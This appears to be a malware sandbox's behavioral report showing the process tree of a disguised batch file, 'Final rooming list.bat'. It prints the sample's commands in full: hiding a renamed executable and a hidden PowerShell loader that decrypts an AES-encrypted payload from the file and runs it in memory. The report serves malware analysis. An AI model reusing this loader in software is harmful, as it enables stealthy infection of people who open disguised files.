ZeroBOX

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LCtKcmsKEZFv" "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"

    2552
    • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"

      2624
      • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat"

        2728
        • attrib.exe attrib +h "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe"

          2840
        • Final rooming list.bat.exe "C:\Users\test22\AppData\Local\Temp\Final rooming list.bat.exe" -w hidden -c "$filePath = 'C:\Users\test22\AppData\Local\Temp\Final rooming list.bat'; $base64Pattern = '::(.*)'; $base64Code = ''; $found = $false; foreach ($line in [System.IO.File]::ReadLines($filePath)) { if ($line -match $base64Pattern) { $base64Code = $Matches[1].Trim(); $found = $true; break; } } if ($found) { $base64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBase64String($base64Code); $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider; $aes.Key = [System.Convert]::FromBase64String($key); $aes.IV = [System.Convert]::FromBase64String($iv); $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC; $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $decryptor = $aes.CreateDecryptor(); $decryptedBytes = $decryptor.TransformFinalBlock($cryptedBytes, 0, $cryptedBytes.Length); $assembly = [System.Reflection.Assembly]::Load($decryptedBytes); $entryPoint = $assembly.EntryPoint; $null = $entryPoint.Invoke($null, @())"

          2884
